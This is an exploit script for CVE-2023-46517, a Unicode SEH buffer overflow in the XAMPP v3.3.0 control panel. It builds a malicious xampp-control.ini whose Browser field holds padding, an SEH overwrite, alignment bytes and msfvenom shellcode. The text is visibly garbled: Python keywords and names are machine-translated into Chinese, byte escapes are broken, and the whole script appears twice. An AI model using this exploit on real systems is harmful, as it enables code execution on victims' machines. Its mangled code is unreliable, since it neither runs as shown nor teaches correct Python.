#exploit title: xampp v3.3.0 - '.ini'缓冲区溢出(unicode + seh)
#日期: 2023-10-26
#作者: Talson(@ripp3rdoc)
#软件link: https://sourceforge.net/projects/xa...x64-8.0.28-0.28-0-0-0-vs16-vs16-installer.exe
#版本: 3.3.0
#测试在: Windows 11
#CVE-2023-46517
##########
#__________________ ____________ _#
#\ __ __ /()(\(_ \(___))(( /|#)
#)(|()||(|(\/|()|| \(|#)
#| | | ()|| | | (__ | | | | | | | | |##
#| | | | _ || | (___)| | | | || (\ \)| #
#| | | ()|| | )|| | | | | | | | \ | #
#| | | )(||(__/\/\ _)||(___)||)\ | #
#)(|/\ |(______/\ _______)(________)|/)_)#
##
##########
#复制概念证明步骤:
#1.-运行python脚本“ poc.py',它将创建一个新文件'xampp-control.ini'
#2.-打开应用程序(XAMPP-control.exe)
#3.-单击Apache服务前面的“管理员”按钮。
#4.-利润
#github:上的概念概念代码https://github.com/ripp3rdoc/xamppv3.3.3.0-bof/
#enetingz到EMU团队(€‿)⩙
从PWN导入*
导入封闭
导入OS.Path
buffer='\ x41' * 268#268字节以填充缓冲区
nseh='\ x59 \ x71'#下一个SEH地址- 0x00590071(无害填充)
seh='\ x15 \ x43'#seh处理程序- 0x00430015: pop ecx;流行EBP; ret;
padd='\ x71' *0x55#填充
eax_align='\ x47'#威尼斯垫/对齐
eax_align +='\ x51'#按
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x58'#pop eax -eax=0019e1a0
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x05 \ x24 \ x11'#添加eax,0x11002300
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x2d \ x11 \ x11'#sub eax,0x11001100 -eax=0019f3dc
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x50'#push eax
eax_align +='\ x71'#pad以对齐以下ret
eax_align +='\ xc3'; #ret toe eax?
#msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f raw exitfunc=thread bufferRegister=eax -o shellcode.bin
#有效载荷尺寸: 512字节
shellCode=((
'Ppyaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaqaaiaqaiaqaiahaaaz1aiaiaiaiaiaiaiaiaiaiaiaiaiaiaibababqi1'
'aiqiaiqi111aiajqyazbabababababkmagb9u4jbklzhrbm0ipm0c0bi7u01ep1tbkbbkb0npdkr2kr2zlrknrkdk42kx'
'jo6wpjnflqioflml1qallbllllo0gqxozmjagw7rzrobpwbknrzpdkmzmzmzmzmlknlzq1hzc1hzc0hkqqwab1dkqikp9qicrk'
'myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML'
'JAZ3DKITRKYQHPU9MTO4KTOK1KC1QI1JNQKO9P1OOOQJTKN2HKRMOMAZJATMBE7BYPM0KPPRM0KPR0PHMADKRODGIOJ57'
'kgpmmnjzjoxdfceemcmyo9emlivcl9ze0ikwpqe9ugkowkcprpo2jip2jip23kohuqsaqsaq0l33lns5pxrekpaa'
)
shellCode=缓冲区+ NSEH + SEH + EAX_ALIGN + PADD + SHELLCODE
check_file=os.path.fisfile('c: \\ xampp \\ xampp-control.ini')
如果check_file:
打印('[!]备份文件找到。生成POC文件.')
经过
其他:
#创建备份
TRY:
shutil.copyfile('c: \ xampp \ xampp-control.ini','c: \ xampp \ xampp-control.ini.bak')
打印('[+]为xampp-control.ini .'创建备份.')
打印('[+]备份文件创建!')
除异常外,E:
打印('[!]失败为Xampp-control.ini:'创建备份,e)
TRY:
#创建新文件
开放('c: \\ xampp \\ xampp-control.ini','w',encoding='utf-8')as file:
file.write(f'''[common]
版本=
编辑器=
浏览器={shellCode}
调试=0
debuglevel=0
语言=en
tomcatvisible=1
最小化=0
[logSettings]
字体=arial
fontsize=10
[Windowsettings]
左=-1
顶部=-1
宽度=682
高度=441
[autostart]
apache=0
mysql=0
filezilla=0
汞=0
tomcat=0
[检查]
CheckRuntimes=1
CheckDefaultPorts=1
[Modulenames]
apache=apache
mysql=mysql
汞=汞
tomcat=tomcat
[enablemodules]
apache=1
mysql=1
filezilla=1
汞=1
tomcat=1
[启用服务]
apache=1
mysql=1
filezilla=1
tomcat=1
[二进制名称]
apache=httpd.exe
mysql=mysqld.exe
filezilla=filezillaserver.exe
filezillaadmin=filezilla Server interface.exe
汞=汞
tomcat=tomcat8.exe
[ServiceNames]
apache=apache2.4
mysql=mysql
filezilla=filezillaserver
tomcat=tomcat
[ServicePorts]
Apache=80
Apachessl=443
mysql=3306
filezilla=21
filezill=14147
汞1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
汞6=143
Mercury7=2224
tomcathtp=8080
tomcatajp=8009
tomcat=8005
[userconfigs]
apache=
mysql=
filezilla=
汞=
tomcat=
[UserLogs]
apache=
mysql=
filezilla=
汞=
tomcat=
''))
打印('[+]创建POC!')
除异常外,E:
print('[!]失败创建POC XAMPP-CONTROL.INI:',e)
#日期: 2023-10-26
#作者: Talson(@ripp3rdoc)
#软件link: https://sourceforge.net/projects/xa...x64-8.0.28-0.28-0-0-0-vs16-vs16-installer.exe
#版本: 3.3.0
#测试在: Windows 11
#CVE-2023-46517
##########
#__________________ ____________ _#
#\ __ __ /()(\(_ \(___))(( /|#)
#)(|()||(|(\/|()|| \(|#)
#| | | ()|| | | (__ | | | | | | | | |##
#| | | | _ || | (___)| | | | || (\ \)| #
#| | | ()|| | )|| | | | | | | | \ | #
#| | | )(||(__/\/\ _)||(___)||)\ | #
#)(|/\ |(______/\ _______)(________)|/)_)#
##
##########
#复制概念证明步骤:
#1.-运行python脚本“ poc.py',它将创建一个新文件'xampp-control.ini'
#2.-打开应用程序(XAMPP-control.exe)
#3.-单击Apache服务前面的“管理员”按钮。
#4.-利润
#github:上的概念概念代码https://github.com/ripp3rdoc/xamppv3.3.3.0-bof/
#enetingz到EMU团队(€‿)⩙
从PWN导入*
导入封闭
导入OS.Path
buffer='\ x41' * 268#268字节以填充缓冲区
nseh='\ x59 \ x71'#下一个SEH地址- 0x00590071(无害填充)
seh='\ x15 \ x43'#seh处理程序- 0x00430015: pop ecx;流行EBP; ret;
padd='\ x71' *0x55#填充
eax_align='\ x47'#威尼斯垫/对齐
eax_align +='\ x51'#按
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x58'#pop eax -eax=0019e1a0
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x05 \ x24 \ x11'#添加eax,0x11002300
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x2d \ x11 \ x11'#sub eax,0x11001100 -eax=0019f3dc
eax_align +='\ x71'#威尼斯垫/对齐
eax_align +='\ x50'#push eax
eax_align +='\ x71'#pad以对齐以下ret
eax_align +='\ xc3'; #ret toe eax?
#msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f raw exitfunc=thread bufferRegister=eax -o shellcode.bin
#有效载荷尺寸: 512字节
shellCode=((
'Ppyaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaqaaiaqaiaqaiahaaaz1aiaiaiaiaiaiaiaiaiaiaiaiaiaiaibababqi1'
'aiqiaiqi111aiajqyazbabababababkmagb9u4jbklzhrbm0ipm0c0bi7u01ep1tbkbbkb0npdkr2kr2zlrknrkdk42kx'
'jo6wpjnflqioflml1qallbllllo0gqxozmjagw7rzrobpwbknrzpdkmzmzmzmzmlknlzq1hzc1hzc0hkqqwab1dkqikp9qicrk'
'myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML'
'JAZ3DKITRKYQHPU9MTO4KTOK1KC1QI1JNQKO9P1OOOQJTKN2HKRMOMAZJATMBE7BYPM0KPPRM0KPR0PHMADKRODGIOJ57'
'kgpmmnjzjoxdfceemcmyo9emlivcl9ze0ikwpqe9ugkowkcprpo2jip2jip23kohuqsaqsaq0l33lns5pxrekpaa'
)
shellCode=缓冲区+ NSEH + SEH + EAX_ALIGN + PADD + SHELLCODE
check_file=os.path.fisfile('c: \\ xampp \\ xampp-control.ini')
如果check_file:
打印('[!]备份文件找到。生成POC文件.')
经过
其他:
#创建备份
TRY:
shutil.copyfile('c: \ xampp \ xampp-control.ini','c: \ xampp \ xampp-control.ini.bak')
打印('[+]为xampp-control.ini .'创建备份.')
打印('[+]备份文件创建!')
除异常外,E:
打印('[!]失败为Xampp-control.ini:'创建备份,e)
TRY:
#创建新文件
开放('c: \\ xampp \\ xampp-control.ini','w',encoding='utf-8')as file:
file.write(f'''[common]
版本=
编辑器=
浏览器={shellCode}
调试=0
debuglevel=0
语言=en
tomcatvisible=1
最小化=0
[logSettings]
字体=arial
fontsize=10
[Windowsettings]
左=-1
顶部=-1
宽度=682
高度=441
[autostart]
apache=0
mysql=0
filezilla=0
汞=0
tomcat=0
[检查]
CheckRuntimes=1
CheckDefaultPorts=1
[Modulenames]
apache=apache
mysql=mysql
汞=汞
tomcat=tomcat
[enablemodules]
apache=1
mysql=1
filezilla=1
汞=1
tomcat=1
[启用服务]
apache=1
mysql=1
filezilla=1
tomcat=1
[二进制名称]
apache=httpd.exe
mysql=mysqld.exe
filezilla=filezillaserver.exe
filezillaadmin=filezilla Server interface.exe
汞=汞
tomcat=tomcat8.exe
[ServiceNames]
apache=apache2.4
mysql=mysql
filezilla=filezillaserver
tomcat=tomcat
[ServicePorts]
Apache=80
Apachessl=443
mysql=3306
filezilla=21
filezill=14147
汞1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
汞6=143
Mercury7=2224
tomcathtp=8080
tomcatajp=8009
tomcat=8005
[userconfigs]
apache=
mysql=
filezilla=
汞=
tomcat=
[UserLogs]
apache=
mysql=
filezilla=
汞=
tomcat=
''))
打印('[+]创建POC!')
除异常外,E:
print('[!]失败创建POC XAMPP-CONTROL.INI:',e)